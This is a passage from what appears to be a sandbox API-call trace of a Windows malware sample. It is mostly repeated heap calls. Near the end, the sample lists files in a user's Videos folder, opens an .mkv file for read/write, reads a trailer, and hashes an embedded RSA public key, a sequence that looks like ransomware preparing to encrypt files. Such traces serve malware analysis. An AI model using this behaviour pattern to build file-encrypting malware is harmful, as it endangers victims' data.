Flags=0x0, Size=0x70) returned 0x99e4078 [0096.851] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.851] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.851] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.851] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.851] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.851] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.851] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.852] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.852] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.852] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.852] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.852] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.852] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.852] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.852] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.852] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.852] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.852] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.852] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.852] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.852] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.852] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.852] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.852] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.852] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.852] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0096.852] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.852] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0096.852] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.852] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.852] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.852] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.852] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.852] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.852] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0096.852] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.852] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.852] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.852] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0096.852] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.852] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.853] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.853] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.853] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.853] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.853] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.853] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.853] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.853] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.853] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.853] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.853] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0096.853] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.853] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0096.853] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.853] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.853] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0096.853] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.853] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.853] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.853] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0096.853] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.853] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.853] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.853] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.853] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.853] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.853] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.853] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.853] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.853] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.853] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.853] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.853] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.853] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.853] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.853] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.853] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.854] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.854] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.854] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.854] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.854] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.854] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.854] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.854] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.854] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.854] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.854] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.854] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.854] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.854] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.854] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.854] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0096.854] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.854] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0096.854] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.854] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.854] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.854] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.854] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.854] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.854] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0096.854] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.854] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.854] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.854] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0096.854] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.854] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.854] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.854] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.854] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.854] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.854] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.854] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.854] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.855] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.855] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.855] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.855] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0096.855] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.855] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0096.855] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.855] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.855] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0096.855] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.855] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.855] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.855] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.855] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.855] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.855] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.855] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.855] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.855] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.855] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.855] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.855] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.855] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.855] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.855] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.855] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.855] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.855] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.855] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.855] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.855] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.855] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.855] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\") returned="Yo5RRMrTBRvZPTzk\\" [0096.855] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3f40 [0096.855] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb988 [0096.856] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.856] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0096.856] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a02dc8 [0096.856] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0096.856] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0096.856] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0096.856] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a02dc8 | out: hHeap=0x680000) returned 1 [0096.856] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0096.856] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0096.856] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0096.856] PathFindFileNameW (pszPath="") returned="" [0096.856] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.856] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x357573f0, ftCreationTime.dwHighDateTime=0x1d5be3d, ftLastAccessTime.dwLowDateTime=0x30c589f0, ftLastAccessTime.dwHighDateTime=0x1d5ba2b, ftLastWriteTime.dwLowDateTime=0x30c589f0, ftLastWriteTime.dwHighDateTime=0x1d5ba2b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31c7500 [0096.856] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.856] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x357573f0, ftCreationTime.dwHighDateTime=0x1d5be3d, ftLastAccessTime.dwLowDateTime=0x30c589f0, ftLastAccessTime.dwHighDateTime=0x1d5ba2b, ftLastWriteTime.dwLowDateTime=0x30c589f0, ftLastWriteTime.dwHighDateTime=0x1d5ba2b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0096.856] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43971740, ftCreationTime.dwHighDateTime=0x1d5c2a7, ftLastAccessTime.dwLowDateTime=0x4cc678c0, ftLastAccessTime.dwHighDateTime=0x1d5bb9e, ftLastWriteTime.dwLowDateTime=0x4cc678c0, ftLastWriteTime.dwHighDateTime=0x1d5bb9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IgvWVBNSz", cAlternateFileName="IGVWVB~1")) returned 1 [0096.856] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df228 [0096.856] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xbe) returned 0x99e6040 [0096.856] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df228 | out: hHeap=0x680000) returned 1 [0096.856] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4258 [0096.856] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b41c0 [0096.856] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4258 | out: hHeap=0x680000) returned 1 [0096.856] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6040 | out: hHeap=0x680000) returned 1 [0096.856] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x463c9000, ftCreationTime.dwHighDateTime=0x1d5b87b, ftLastAccessTime.dwLowDateTime=0xb133f1a0, ftLastAccessTime.dwHighDateTime=0x1d5c091, ftLastWriteTime.dwLowDateTime=0xb133f1a0, ftLastWriteTime.dwHighDateTime=0x1d5c091, nFileSizeHigh=0x0, nFileSizeLow=0x14efd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PR35tl5T1KTAZk_duC3_.mkv", cAlternateFileName="PR35TL~1.MKV")) returned 1 [0096.856] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.856] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa6) returned 0x3152ab8 [0096.856] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.857] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\PR35tl5T1KTAZk_duC3_.mkv") returned=".mkv" [0096.857] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\PR35tl5T1KTAZk_duC3_.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\pr35tl5t1ktazk_duc3_.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0096.857] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=85757) returned 1 [0096.857] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0096.860] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x14ed7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.860] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0096.860] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.861] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.861] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.861] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x14efd, lpOverlapped=0x0) returned 1 [0096.861] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.861] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0096.861] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.861] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.861] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df228) returned 1 [0096.862] CryptCreateHash (in: hProv=0x6df228, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0096.862] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0096.862] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0096.862] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0096.862] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0096.862] GetLastError () returned 0x0 [0096.862] CryptDestroyHash (hHash=0x31c7580) returned 1 [0096.862] CryptReleaseContext (hProv=0x6df228, dwFlags=0x0) returned 1 [0096.863] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 